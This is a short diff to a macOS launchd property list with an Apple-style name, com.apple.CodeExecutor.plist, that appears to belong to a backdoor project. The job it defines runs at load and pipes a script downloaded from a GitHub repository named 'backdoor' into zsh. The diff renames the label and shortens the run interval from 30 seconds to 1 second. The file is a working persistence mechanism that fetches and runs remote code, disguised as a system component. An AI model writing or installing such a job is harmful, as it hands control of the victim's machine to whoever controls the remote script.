--- a/com.apple.CodeExecutor.plist
+++ b/com.apple.CodeExecutor.plist
@@ -3,17 +3,15 @@
 <plist version="1.0">
 <dict>
    <key>Label</key>
-   <string>com.wolfoverflow.thing</string>
+   <string>com.wolfoverflow.CodeExecutor</string>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/bash</string>
        <string>-c</string>
        <string>curl -S "https://raw.githubusercontent.com/Wolfoverflow/backdoor/main/script" | zsh</string>
    </array>
-   <key>StartInterval</key>
-   <dict>
-       <integer>30</integer>
-   </dict>
+    <key>StartInterval</key>
+    <integer>1</integer>
    <key>RunAtLoad</key>
    <true/>
 </dict>
